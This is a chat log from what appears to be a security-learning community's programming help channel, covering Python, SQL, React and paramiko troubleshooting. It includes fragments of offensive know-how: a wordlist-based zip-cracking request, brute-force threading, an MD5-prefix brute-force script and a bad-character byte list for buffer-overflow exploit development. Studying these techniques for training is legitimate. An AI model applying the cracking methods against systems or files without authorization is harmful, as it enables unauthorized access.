Imagine I let it crawl overnight, then the power goes out in the morning before I wake up. so I actually have zero output on hand after an entire night of crawling. that would be unreliable

Is it bad practice to just call .flush() every 100 output lines or something?

Will it hinder performance if i'm calling flush after every line? just curious

Hey Guys I've finished the "Python for Pentesters" course and I'm totally stuck in "Extra challenges" I tried a couple of hours to implement threading in brute-forcing, but everything I've tested dosen't work... could anyone show me the right code with the code in Task 9 ?

Anyone here know bash scripting? DM please

you're more likely to get a response if you ask the question you have

I need to create a bash script with a for loop that cracks recursive zip files using a dictionary or wordlist

is it for a homework assignment?

Nah

i am struggling with few ctf questions which we had in internal team event last week, which is the best place to ask those questions to get help and guidance on

I prefer using futures and multiprocessing, but the documentation is clear enough, usually

there are also literally thousands of examples on the web

recursive as in a zip within a zip?

depends on the question 🙂

maybe try to see if a THM walkthrough room exists on the topic

Yes

numerous zips within zips

break the problem down into steps, what would you need to do first, then second, then third, etc

then how would you recurse that properly

also, that's a terrible idea and you should not be trying to compress compressed data 🙂

this is definitely a CTF challenge on another site iirc 😆

I can't make it... maybe my code is working or not... hmm but I cannot see a different time with the original code and the original code + multiprocessing code...

Hi, I'm trying to learn C++ and Python for exploit development. I am new to programming and want to learn stuff like automating a SQLi using Python etc. I watched Rana Khalils channel on YouTube and she goes beyond finding exploits but actually writes code to automate them. It looks simple enough but just curious where I can learn this type of skill. Does anyone know of any good resources or beginner projects? If so then thank you.

I would start with python if you are new to programming. C++ is extremely difficult to learn. Also if you want to go more into expoit stuff I would recommend C instead of C++ which is easier and you can transfer the Knowledge later on to learn C++ if needed. resources are online available. I would recommend taking a udemy course to get you started and than get some good books. You learn a lot more from books and the official documentation than from video courses because you need to think more for yourself. But to get started I think a video course is a good thing.

A lot of networking and hardware stuff is written in C not in C++. It´s also closer to the Maschine.

-ban @glossy pewter putting an IP logger in chat..?

fuck you

🔨 Banned Arafat#2615 indefinitely

Robocop decided to let him have some last words

I mean if you're going to put an ip logger in chat, at least make an effort to hide it

Hi guys 🙂

lmao

Thank you, I will check out Udemy. I started with C++ and I really liked the syntax so I decided to learn it along side python. But I feel like I need to learn C/C++ because I am interested in the operating system and exploiting it. I am also interested in web app exploits which is why I want to learn python too. I am half way through C++ for dummies and its actually making a lot of sense to me and isn't that hard. Then I tried to learn Win API and that is where I got majorly stuck.

Gave +1 Rep to @silver marten

I think most of the web stuff would be written on JS/TS Frameworks so you can lookup on that as well, if you want.

http://fvtcaitp.org/challenges/17/login.html So, Im doing a hacking challenge online where you have to find a hidden key and im at the final level and i am completely blank on what to do with this one. I know for a fact its in the page source code and most likely hidden inside the Ajax jquery/3.4.0/jquery.min.js but i cannot figure it out for the life of me. Can someone give me some advice? I dont want the answer, I wanna answer it myself but id like some resources from someone who might know more than me.

I didn't take a look but if you think it's hidden in jquery.min.js then diff the file it's serving to the official jquery.min.js for that version to see what the difference is between the two. Official one hosted here https://code.jquery.com/jquery-3.4.0.min.js

Thanks for that

Looks like my guess was wrong and the only thing I can think of is trying to do some injections with burp

Most sane people don't muck around in minified JS vendor code

Hey can anyone help with a simple SQL query ?
I've made a new column which is all null, I want to fill that column in with the CONCAT of other two columns.
I can't figure out a query which does it automatically, I don't want to do a query individually for every 15 rows

CONCAT(column_name1, column_name2) AS column_name;

You figure that would be well documented

''||column_name1||column_name2 AS column_name

WITH column_alias as (SELECT CONCAT(column_name1,column_name2) from table_name)
SELECT columns,
CASE
WHEN null_column IS NULL THEN column_alias
else something
END AS case_alias
from column_alias;

You create an alias using the WITH clause which lets you run a subquery, the subquery will concatenate the 2 columns for you from the table you're selecting it from.
You then select your list of columns you want to display and you add a CASE statement so that if a NULL value is detected in that new column, you can overwrite it with the result from your subquery.
Lastly you select the data from the alias you've created and this behaviour should replicate over all of the rows that are returned.

Excuse the awful formatting, it's been a while

why does that seem more complicated than it needs to be?

Thank you SO much

Gave +1 Rep to @wraith latch

ill write that down

and run the query

if you i can supply you with the table

You know what, perhaps it is I'll give you that. I do feel that this one captures each point of what was asked, however they did ask for a simple query. They received multiple submissions, I hope at least I helped them to learn some new concepts

Definitely learning new concepts

Not a simple query though, sorry about that

its alright!, so if you see the berth_name, im trying to input data in that

I mean, good to do the null check though

where the data is just the concatation of pier and number

I'm used to dealing with horrible databases 😄

couldn't you dynamically build that in code?

or a stored procedure or something

stored procedure is a good shout for sure

I don't know anything about databases, I try to get that stuff abstracted away

could do that, i've been googling alot and even tried to create a trigger, but it doesn't work

you could have a stored procedure run when a trigger is... well triggered lol

seems like the naming rule isn't too complex, and depends on exactly one table

@wraith latch could you try modyfing that query using this picture

this picture

i've never used CASE and WHEN xD

may need to differentiate between the alias and the table name

part of your issue is how I perceived it

I thought you meant that your new table contained null values, what I see however is null values everywhere

when you select these columns, are you joining any tables?

ok so there is only 1 table which i send the picture of.
what i want to do is that combine berth.pier and berth.number (using CONCAT) and then storing that value in the new column I made using ALTER table called berth_name which is VARCHAR(6)

don't see any joins

for every row

so just combining pier and number columns for each row and inserting them in berth_name which is the new column; BUT to do it automatically in 1 query for all the rows

Thats the question ^

Is this a homework assignment or something?

its an assingment for a course im taking; I wanted to learn SQL injection so i took a Database management class at univeristy

and now im stuck with some weird queries which i dont think ill use in SQLi 😂

Inserting data in SQL is quite specific, they have a INSERT statement for that. Is that what you mean, or do you mean to make the value of the column appear as something else which would be a case statement

Sorry I should've asked before, I believe as a rule we're not meant to help with homework

its not a homework, its like elective classes you can take as a part of a club

I can do INSERT INTO table_name ..... BUT i'd have to do it for all 15 rows; im looking for a way to do it in 1 query

like the query is supposed to "automatically" fill in each row

So the question is not formulated right in my opinion

It's not specifying whether it wants to you SELECT or INSERT data

So it wants us to INSERT data into berth_name (which is a new column)

this is the question

then my query example will be of no use to oyu

because that is selecting data

yup!

and just manipulating what you see

Honestly, this sounds a little too close to home work for me to be comfortable helping you.

I would recommend you do some reading from the data base engine documentation to understand the types of queries better.

its not a problem @magic falcon , its not graded

Here's the problem: We can't know if you're being honest, and this is a very common homework or lab assignment for database coursework.

this is true

For anything SQL related, in order to understand what functions are available I tend to use W3 schools, at this point I'd give you that as advice but I'll have to leave it at that

sure makes sense!
It is an assingment for the club course, not an actual university course

sure! Thanks

Gave +1 Rep to @wraith latch

probably still best to learn it on your own

thanks @brazen eagle @magic falcon

Good luck!

the W3 schools material is fine for basic info, but there are difference between the different SQL engines that can cause things to not work as expected. Please read the language documentation published by the RDB engine project - Postgres, MySQL/MariaDB have really excellent documentation, and I'm sure MSSQL has a similar doc.

got it, will read those documentations as well

@magic falcon I can confirm that MSSQL have got dedicated microsoft docs, have used them in the past

Hey guys

Should enrich my skill in python for exploitation

Or any other languages are required to learn?

Python is alright

But I’d probably say Ruby/ C for exploit writing

And JS/ Go for web

Why Ruby for exploit writing? I would think it's going to be a fairly uncommon

Mayor recommends it iirc, it's easier for bofs because of how it handles raw bytes

I'm surprised it's recommended, given that Ruby and Ruby on Rails is not nearly as omnipresent as python and various flavors of Node seem to be

Most metasploit modules are compiled in RB

@foggy bolt Don't suggest cheating sites, especially completely unsolicited

It's a learning resource and people still learn from it, especially if their instructor is shit.

No one asked, and this community is strictly ethical. Suggesting cheating breaks that rule of strict ethics.

I’m going to try master python3, go, and c

I have some projects in the python3 but I need to get a little better

Hey am trying to write a python script where It will return an md5 hashes that starts with "xxxxx"

and i got some errors

import re

product = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']

def find_hash():
    x=1
    while True:
        for combo in (product, repeat:=x): 
            possible_hash = hashlib.md5(f"{''.join(combo)}".encode("utf-8")).hexdigest()
            if possible_hash.startswith("1170"): 
                print(f"[+] {''.join(combo)} found with hash '{possible_hash}'.")
                return f"{''.join(combo)}"
        else:
            x +=1

find_hash()```

can u help please!

Please share the errors with us

possible_hash = hashlib.md5(f"{''.join(combo)}".encode("utf-8")).hexdigest()
TypeError: can only join an iterable

"combo" is not an iterable

What datatype is it?

Also that line does way too much. It's hard to read.

I mean is supposed to be a string! i used it to run a counter in products list

Yeah, but I didn't ask what it's supposed to be

I asked what it is

is a string

How did you check?

Because strings are iterables, so you would not get that error if it was a string

but am trying to form a string, why would it take another datatype, where did i mess it up

¯_(ツ)_/¯

You can explicitly print out what datatype it is, and you can cast it too

you probably want itertools.combinations or similar in your loop.

Casting a complex object can give really wild results

for combo in (product, repeat:=x): Python's got wild lately

I have genuinely no clue what that does

in my python this is just a tuple with 2 entries, the array and x ([' a', 'b', ...], 1) which is not what it is intended to be

High level advice would be break the problem down into more easily solvable chunks, into functions, and combine them. Makes it easier to test each chunk separately

I have already started rewritting my script again!

I try to not make it complex as it was! thanks for ur help

Complex is ok, if it's broken into simple chunks

Problems can be complex, but part of good programming is making it into smaller solvable problems

why isnt this working?

just hangs

when I run the scripts

script

Can you think what you could do to monitor its progress?

yeah

it freezes at ssh.connect()

scp client is not good

ill use the secure file transfer protcool that

paramiko has

Isn't ssh connect before you touch the scp library?

yeah

which I did

So if it freezes here, doesn't that point to a problem there?
What's wrong with the scp library? You're not touching that code yet, so that can't be the cause

someone wrong with ssh

thats where it freezes

How much do you know about sftp in this case?

good amount

I know its ftp but secure

So you know it runs over SSH right?

So if you can't SSH connect as it is, that problem will still be there

well I just tested it

it works

the ssh works

So it either wasn't freezing at ssh connect, or something has changed in that time. The second is more likely.

yeah it was freezing at ssh

my linode machine was also acting up

so I deleted it

and made a new it

now

one*

So it wasn't a problem with the code at all

yeah

cause now it works

Where did this challenge come from?

For a job interview?

So it is cheating to ask us for help

It's trying to assess your abilities, not ours.

We don't help people cheat here.

Hi everyone, I wonder what is the best practice to save a JWT token? In httpcookie, user might be subjected to CSRF. In session storage, user might be subjected to xss. thanks in advanced

I read in stackoverflow about double submit method, which has XSRF token value in JWT claims and check whether it match

Send in the Authorization header, write an app that isn't vulnerable to XSS. Convention is session storage

You can work around the csrf issue with samesite on the cookies, as best practice, along with csrf tokens etc

hey guys. i have this list of bad characters and im trying to remove just one from them but im having a hard time doing this
bad_chars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

im trying to automate the bad char part when doing BOF and what im doing right now is asking for an input from the user and then removing it with the replace() function but it seems to not work bc of type error

Hmmm yeah, I write my frontend in react. Do you think react is xss proof? I mean facebook maintain it...

I've seen XSS in react apps.

Seems the token will gone after a refresh?

well...

Defense in depth

So, put it on cookies with samesite + utilize csrf token is better than put it on session storage? I won't put the token in javascript state as it is not UX friendly

Better is relative, it's all tradeoffs. Session storage isn't perfect but it's convention. Very smart people will argue either way. Remember, XSS is game over either way because XSS can interact with the dom and click buttons etc

In which scripting language are you trying to achieve this? Also just to confirm, you want to search for each of these characters and then remove them?
For example in python you need an object that's iterable --> https://www.w3schools.com/python/python_iterators.asp
I'd imagine you'd then need to write a simple for loop to achieve what you want.

Hope that helps!

Ahhh that's make sense (xss part). Thanks for giving me advice 🙂

Gave +1 Rep to @onyx merlin

Guyz i need help

with what?

I'm fiddling with Paramiko, i have a series of commands that generate a TON of output on a very old (RHEL 6.x) type box, but when i use it on a new rhel 7/8/9 box i get an obscure tty error msg. I tried to bypass the msg with a sudo hook , but now i dont get any output

I even tried to bypass the tty requirement in /etc/sudoers .. but it still dumped an error

could this be !visiblepassword in /etc/sudoers ?

can someone help me rq with a basic html thing i need to recreate as a homework?

not with homework 😔 sry!

dawm

no problem thx either way

I think this snippet from the bash man page might help you

${!name[*]}

List of array keys. If name is an array variable, expands to the list of array indices (keys) assigned in name. If name is not an array, expands to 0 if name is set and null otherwise. When @ is used and the expansion appears within double quotes, each key expands to a separate word.```

${!output[@]}

This is what you'd be referring to in order to return the index of each entry that you've grepped for

If I want to make a custom discord bot for myself, does it really matter which language I code it in?

I work with Java, but doing research on discord bot development python seems to be the best choice

Is it worth picking up a new language just for that? Or java will do just fine?

I've built a simple discord bot for my previous game with java that tracked players online, event status, etc and had no problems with it

But the bot I want to make now is a bit more complex

Yes and no.

Mostly it’s just preference but you’ll want to check which one has the best documentation.

I program in JavaScript because I find it the easiest compared to all the languages

JDA seems pretty well documented, I think I'll stick with Java

I might be over thinking the solution here but anyone got any idea for this.
I'm trying to get a python script to combine the similar and replace the BLANK with the opposing value

To consolidate it to

Use properly keyed dictionaries

is anyone knowlegable with js and async functions and is willing to help me with a problem?

what is it for?

im working on a firebase chat app

based on the fireship one but updated

im getting an array of the messages from the database but it requires await

so roughly it goes

getdata(await getDocs())
arr = getData

and the arr is returned as a promise and the code messes up later becasue of this line

is it for a job assignment or school or something like that? 😄

just for fun

can i dm u photos of the code? i cant send them here

please post it here

!docs verify

after you verify you can send pics

ok

wait i could just copy the code

w/e makes it easiest

this is not great

😄

at least use code blocks haha

oh how do i do that

triple backtick

 const dummy = useRef();
  const messagesRef = collection(firestore, "messages");
  const qer = query(messagesRef, orderBy("createdAt"), limit(25));
  const [formValue, setFormValue] = useState('');

  const sendMessage = async (e) => {
    e.preventDefault();

    const { uid, photoURL } = auth.currentUser;

     await addDoc(messagesRef, {
      text: formValue,
      createdAt: serverTimestamp(),
      uid,
      photoURL
    });
    
    console.log(formValue)

    setFormValue('');
    dummy.current.scrollIntoView({ behavior: 'smooth' });
    root.render(<App user={auth.currentUser} />)
  }

  const retriveData = async () => {
    const teemp = []
    const snapQ = await getDocs(qer);
    snapQ.forEach((doc) => {
      let tempReply = doc.data();
      tempReply.id = doc.id;
      teemp.push(tempReply);
    })
    return teemp
  }
  let messages = retriveData()

  // const p = Promise.resolve(retriveData())
  // p.then((v) => { 
  //   console.log(v)
  // })
  
  console.log(messages)

  return (<>
    <main>
    {messages.map(msg => <ChatMessage key={msg.id} message={msg} />)}
    </main>

    <span ref={dummy}></span>

    <form onSubmit={sendMessage}>

      <input value={formValue} onChange={(e) => setFormValue(e.target.value)} placeholder="Text Here" />

      <button type="submit" disabled={!formValue}>Send</button>

    </form>
  </>);

 const dummy = useRef();
  const messagesRef = collection(firestore, "messages");
  const qer = query(messagesRef, orderBy("createdAt"), limit(25));
  const [formValue, setFormValue] = useState('');

  const sendMessage = async (e) => {
    e.preventDefault();

    const { uid, photoURL } = auth.currentUser;

     await addDoc(messagesRef, {
      text: formValue,
      createdAt: serverTimestamp(),
      uid,
      photoURL
    });
    
    console.log(formValue)

    setFormValue('');
    dummy.current.scrollIntoView({ behavior: 'smooth' });
    root.render(<App user={auth.currentUser} />)
  }

  const retriveData = async () => {
    const teemp = []
    const snapQ = await getDocs(qer);
    snapQ.forEach((doc) => {
      let tempReply = doc.data();
      tempReply.id = doc.id;
      teemp.push(tempReply);
    })
    return teemp
  }
  let messages = retriveData()

  // const p = Promise.resolve(retriveData())
  // p.then((v) => { 
  //   console.log(v)
  // })
  
  console.log(messages)

  return (<>
    <main>
    {messages.map(msg => <ChatMessage key={msg.id} message={msg} />)}
    </main>

    <span ref={dummy}></span>

    <form onSubmit={sendMessage}>

      <input value={formValue} onChange={(e) => setFormValue(e.target.value)} placeholder="Text Here" />

      <button type="submit" disabled={!formValue}>Send</button>

    </form>
  </>);

if you do triple backtick followed by javascript it will add some nice syntax highlighting 🙂

ooh cool

Uncaught TypeError: messages.map is not a function

thats the error message

okay

and printing messgaes returns

so messages if not the right type is my first thought. You cant map it

Promise {<pending>}
[[Prototype]]: Promise
[[PromiseState]]: "fulfilled"
[[PromiseResult]]: Array(6)

its still a promise when map is called

let me make sense of your code for a sec

yeah np

can you try Array.from(messages).map... just to test for a moment? in a console log or whatever

map() {[native code] }

no type error?

i know its an issue with the fact the async function isnt finished running before the code in the html is called

and message is still a promise rather than an array

cuz if i print teemp inside the function, it prints just fine

then try to use await

thats the issue is i cant

cuz the function is a react component

have you checked options in the react comp lifecycles? componentDidMount and such

the retrievedata needs to be async becasue of the await on getDocs, but that makes it so messages isnt an array before the map is called on it

let messages = retriveData()

https://www.valentinog.com/blog/await-react/

see if this can help you

@fervent monolith I deleted that wall of text. Please use code blocks or verify your THM account to post screenshots.

yeah i was told

sorry about that

Does anyone know a good place to practice python programming? Not sure if I asked here

have you checked the pinned messages in this channel??? lots of suggested practice sites on there

Thank you, will check it out

Gave +1 Rep to @inland hazel

no problems

Where are pinned messages?

top right

Thank you I forgot

its like this:

😄

😄

def createZIP():
    fileList = []
    
    print(f'''

    ----- Password Protected ZIP Creator -----

    Example of ZIP name - test.zip
    

        ''')
    print("Name of zip file to be created?")
    zipFileName = input("> ")
    print("Name of password for your zip file?")
    passwordFile = input("> ")
    if not zipFileName.endswith(".zip"):
        print("Only enter .zip at the end of the file")
        createZIP()
    FilesToBeTransfered = input(f"Amount of files to transfer to {zipFileName}:")

    if int(FilesToBeTransfered.strip()) == 1:
        print("Enter the file path.")
        OneFilePath = input("> ")
        pyminizip.compress(OneFilePath, None, zipFileName, passwordFile, 5)
        print(f"ZIP File has been succesfully created.")
        createZIP()
    else:
        for fileNames in range(int(FilesToBeTransfered)):
            files = input(f"FILE NAME-{fileNames}>")
            fileList.append(files)

        #for y in range(int(FilesToBeTransfered)):
        #pyminizip.compress(fileList[0], None, zipFileName, passwordFile, 5)
        print("Created Zip. Now sending files.")

        #for y in range(int(FilesToBeTransfered) - 1):
        #zipfile.setpassword(pwd=passwordFile)
        for file in fileList:
            pyminizip.compress(file, None, zipFileName, passwordFile, 5)
        print("File Transfer Completed. ZIP has been created.")

I'm having some trouble with

creating a password protected zip file

with multiple files

and it's all from user input

If it wasn't from user input it would have been much easier

but I have tried a lot of things see if I can fix this but

the output to this just gives me testing.zip

with a file of test2.txt

I put 2 files to transfer

test1.txt

test2.txt

The for loop at the end overwrites the file

pzminizip says you can compress multiple files

but

pyminizip.compress_multiple([u'pyminizip.so', 'file2.txt'], [u'/path_for_file1', u'/path_for_file2'], "file.zip", "1233", 4, progress)

I don't know how I would do that if it was from user input only

I would have to manually add the files everytime which I don't want to do

It takes a list as an argument, so you need to build that list of files and then call the function

What do you mean by build?

Create. Assemble. Produce.

I'm only looping through the list

Oh. Just pass that list...

?

Would this be good?

Does it work?

Let me test it

Test before asking.

https://tryitands.ee/

Ooh yay, you've cropped 90% of the useful info out of that

You're passing an array of files here